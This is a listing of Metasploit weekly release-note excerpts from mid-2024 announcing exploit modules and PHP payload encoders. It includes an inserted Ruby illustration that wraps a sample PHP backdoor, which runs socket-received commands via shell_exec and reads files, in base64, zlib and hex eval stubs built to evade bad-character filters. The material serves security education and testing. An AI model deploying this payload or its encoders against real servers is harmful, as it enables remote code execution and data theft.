Metasploit Weekly Wrap-Up 09/13/2024
SPIP Modules
This week brings more modules targeting the SPIP publishing platform. SPIP has
gained some attention from Metasploit community contributors recently and has
inspired some PHP payload and encoder improvements.
New module content (2)
SPIP BigUp Plugin Unauthenticated RCE
Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec
Type: Exploit
Pull request: #19444 [http://github.com/rapid7/metasploit-framework/pull/19444]
Contributed by Chocapikk [http://github.com/Chocapikk]
Pat
Metasploit Weekly Wrap-Up 09/06/2024
Honey, I Shrunk the PHP Payloads
This release contains more PHP payload improvements from Julien Voisin. Last
week we landed a PR from Julien that added a datastore option to the php/base64
encoder that, when enabled, uses zlib to compress the payload before encoding,
significantly reducing its size: a payload of 4040 bytes came down to a mere
1617 bytes. This week's release includes a php/minify encoder which removes all
unnecessary characters from the payload including comments, empty lines, leadin
Metasploit Weekly Wrap-Up 08/30/2024
A New Way to Encode PHP Payloads
A new PHP encoder has been released by a community contributor, jvoisin
[http://github.com/jvoisin], allowing a PHP payload to be encoded as an
ASCII-hex string. This can then be decoded on the receiver to avoid problems
with unescaped characters or bad characters.
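The two posts above describe two ways of wrapping a PHP payload so it survives a hostile injection point: base64 (optionally zlib-compressed first) and ASCII-hex. As an added illustration that is not part of the original posts and is not the framework's own encoder code, the Ruby below builds both kinds of decoder stub, runs a bad-character check over the encoded body, and emulates the PHP-side decode so the round trip can be verified offline. The sample PHP stager, the stub shapes (`eval(gzuncompress(base64_decode(...)))` and `eval(hex2bin(...))`) and all helper names are assumptions made for this example; the exact stubs that Metasploit's php/base64 and the new hex encoder emit may differ.

```ruby
require 'zlib'
require 'base64'

# Constructed sample payload (NOT a Metasploit payload): a small stager-like
# script with repetitive helpers, so compression has something to work with.
# It deliberately contains quotes, semicolons, backslashes and newlines, the
# kind of characters an injection point often cannot carry verbatim.
SAMPLE_PHP = <<~'PHP'
  <?php
  // constructed demo payload: stager-like helpers with lots of repetition
  function read_line($sock) { $buf = ''; while (($ch = fread($sock, 1)) !== false && $ch !== "\n") { $buf .= $ch; } return $buf; }
  function send_line($sock, $data) { fwrite($sock, $data . "\n"); fflush($sock); }
  function send_error($sock, $data) { fwrite($sock, "error: " . $data . "\n"); fflush($sock); }
  function run_command($cmd) { return shell_exec($cmd . " 2>&1"); }
  function read_file($path) { return file_get_contents($path); }
  $sock = fsockopen("127.0.0.1", 4444);
  while (($line = read_line($sock)) !== '') {
    if (substr($line, 0, 5) === "read ") { send_line($sock, read_file(substr($line, 5))); }
    elseif (substr($line, 0, 4) === "run ") { send_line($sock, run_command(substr($line, 4))); }
    else { send_error($sock, $line); }
  }
PHP

# PHP's eval() takes code without the opening tag, so strip it before wrapping.
def strip_php_tag(php)
  php.sub(/\A\s*<\?php\s*/, '')
end

# Base64 stub, optionally zlib-compressing first. Ruby's Zlib::Deflate emits
# zlib-format data, which PHP's gzuncompress() (not gzinflate()) accepts.
def php_base64_stub(php, compress: false)
  body = strip_php_tag(php)
  if compress
    enc = Base64.strict_encode64(Zlib::Deflate.deflate(body, Zlib::BEST_COMPRESSION))
    "eval(gzuncompress(base64_decode('#{enc}')));"
  else
    "eval(base64_decode('#{Base64.strict_encode64(body)}'));"
  end
end

# ASCII-hex stub: the encoded body is [0-9a-f] only, decoded by PHP's hex2bin().
def php_hex_stub(php)
  "eval(hex2bin('#{strip_php_tag(php).unpack1('H*')}'));"
end

# Return the bad characters still present in the encoded body (the stub text
# around it is fixed and known, so only the body is checked).
def remaining_badchars(stub, badchars)
  body = stub[/'([^']*)'/, 1]
  badchars.chars.select { |c| body.include?(c) }
end

# Emulate the receiver side in Ruby so the round trip can be checked offline.
def decode_stub(stub)
  body = stub[/'([^']*)'/, 1]
  case stub
  when /\Aeval\(gzuncompress\(base64_decode/ then Zlib::Inflate.inflate(Base64.strict_decode64(body))
  when /\Aeval\(base64_decode/ then Base64.strict_decode64(body)
  when /\Aeval\(hex2bin/ then [body].pack('H*')
  else raise ArgumentError, 'unknown stub shape'
  end
end

# Size of each encoding of the same payload, stub included.
def size_report(php)
  {
    raw: php.bytesize,
    base64: php_base64_stub(php).bytesize,
    base64_zlib: php_base64_stub(php, compress: true).bytesize,
    hex: php_hex_stub(php).bytesize
  }
end

if $PROGRAM_NAME == __FILE__
  size_report(SAMPLE_PHP).each { |name, bytes| puts format('%-12s %5d bytes', name, bytes) }
  puts remaining_badchars(php_base64_stub(SAMPLE_PHP), "+/=").inspect
  puts remaining_badchars(php_hex_stub(SAMPLE_PHP), "+/=\"';\n\\").inspect
end
```

The trade-off the two encoders make is visible in the numbers: hex doubles the payload but its body can never contain anything outside `[0-9a-f]`, so any bad-character set that spares those sixteen characters is safe, whereas a base64 body may still carry `+`, `/` or `=`. Compression only pays off when the payload is large or repetitive enough for zlib to beat the 4/3 expansion of base64, which is why the post quotes the gain on a 4040-byte payload rather than on a one-liner.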
Ray Vulnerabilities
This release of Metasploit Framework also features 3 new modules to target
ray.io, which is a framework for distributing AI-related workloads across
multiple machines, which makes it a
Metasploit Weekly Wrap-Up 08/23/2024
New module content (3)
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #19373 [http://github.com/rapid7/metasploit-framework/pull/19373]
Contributed by h4x-x0r [http://github.com/h4x-x0r]
Path: admin/http/fortra_filecatalyst_workflow_sqli
AttackerKB reference: CVE-2024-5276
[http://attackerkb.com/search?q=CVE-2024-5276&referrer=blog]
Description: This adds an auxiliary module to exploit CVE-2024-5276, a SQL
inj
Metasploit Weekly Wrap-Up 08/16/2024
New module content (3)
Apache HugeGraph Gremlin RCE
Authors: 6right and jheysel-r7
Type: Exploit
Pull request: #19348 [http://github.com/rapid7/metasploit-framework/pull/19348]
Contributed by jheysel-r7 [http://github.com/jheysel-r7]
Path: linux/http/apache_hugegraph_gremlin_rce
AttackerKB reference: CVE-2024-27348
[http://attackerkb.com/search?q=CVE-2024-27348&referrer=blog]
Description: Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335
[http://github.com/advisories/GHSA-29r
Metasploit Weekly Wrap-Up 08/09/2024
Black Hat & DEF CON
Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner
[http://x.com/zeroSteiner] & Jack Heysel presenting Metasploit 6.4's
features at Black Hat, focusing on combinations that allow for new, streamlined
attack workflows. If not, they will also be demoing at DEF CON tomorrow in
room W304!
New module content (1)
Calibre Python Code Injection (CVE-2024-6782)
Authors: Amos Ng and Michael Heinzl
Type: Exploit
Pull request: #19357 [http://github.com/rapid7/meta
Metasploit Weekly Wrap-Up 08/02/2024
Metasploit Goes to Hacker Summer Camp
Next week, Metasploit will have demos at both Black Hat
[http://www.blackhat.com/us-24/arsenal/schedule/index.html#metasploit-framework-39570]
and DEF CON [http://defcon.org/html/defcon-32/dc-32-demolabs.html#54186], where
the latest functionality from this year will be presented. The Black Hat demo
will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on
Saturday the 10th from 12:00 to 13:45.
Highlights will include demonstrating
Metasploit Weekly Wrap-Up 07/26/2024
New module content (3)
Magento XXE Deserialization Arbitrary File Read
Authors: Heyder and Sergey Temnikov
Type: Auxiliary
Pull request: #19304 [http://github.com/rapid7/metasploit-framework/pull/19304]
Contributed by heyder [http://github.com/heyder]
Path: gather/magento_xxe_cve_2024_34102
AttackerKB reference: CVE-2024-34102
[http://attackerkb.com/search?q=CVE-2024-34102&referrer=blog]
Description: This adds an auxiliary module for an XXE which results in an
arbitrary file read in Magento
Metasploit Weekly Wrap-Up 07/19/2024
A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.
Metasploit Weekly Wrap-Up 07/12/2024
The Usual Suspects
This release features two new exploits targeting old friends: Confluence and
Ivanti. CVE-2024-21683
[http://attackerkb.com/search?q=CVE-2024-21683&referrer=blog] is an easy
vulnerability to exploit, but as pointed out in the AttackerKB Review
[http://attackerkb.com/assessments/5ad314a1-9fd7-47d7-835f-f29680b3961d?referrer=blog],
it requires authentication as a 'Confluence Administrator.' On the other hand,
CVE-2024-29824 is an unauthenticated SQL Injection in Ivanti End
Metasploit Weekly Wrap-Up 07/05/2024
3 new modules - MOVEit Transfer authentication bypass CVE-2024-5806, Zyxel command injection, and Azure CLI credential gatherer
Metasploit Weekly Wrap-Up 06/28/2024
Unauthenticated Command Injection in Netis Router
This week's Metasploit release includes an exploit module for an unauthenticated
command injection vulnerability in the Netis MW5360 router, which is being
tracked as CVE-2024-22729. The vulnerability stems from improper handling of the
password parameter within the router's web interface, which allows for command
injection. Fortunately for attackers, the router's login page authorization can
be bypassed by simply deleting the authorization header,
Metasploit Weekly Wrap-Up 06/21/2024
Argument Injection in PHP on Windows
This week includes modules that target file traversal and arbitrary file read
vulnerabilities for software such as Apache, SolarWinds and Check Point, with
the highlight being a module for the recent PHP vulnerability submitted by
sfewer-r7 [http://github.com/sfewer-r7]. This module exploits an argument
injection vulnerability, resulting in remote code execution and a Meterpreter
shell running in the context of the Administrator user.
Note that this attack
Metasploit Weekly Wrap-Up 06/14/2024
New module content (5)
Telerik Report Server Authentication Bypass
Authors: SinSinology and Spencer McIntyre
Type: Auxiliary
Pull request: #19242 [http://github.com/rapid7/metasploit-framework/pull/19242]
Contributed by zeroSteiner [http://github.com/zeroSteiner]
Path: scanner/http/telerik_report_server_auth_bypass
AttackerKB reference: CVE-2024-4358
[http://attackerkb.com/search?q=CVE-2024-4358&referrer=blog]
Description: This adds an exploit for CVE-2024-4358 which is an authentication
bypass in Te
Metasploit Weekly Wrap-Up 06/07/2024
New OSX Payloads: Armed and Dangerous
In addition to an exploit leveraging CVE-2024-5084 to gain RCE through a WordPress
Hash Form, this release features the addition of several new binary OSX
stageless payloads with aarch64 support: Execute Command, Shell Bind TCP, and
Reverse TCP.
The new osx/aarch64/shell_bind_tcp payload opens a listening port on the target
machine, which allows the attacker to connect to this open port to spawn a
command shell using the user provided command using the exe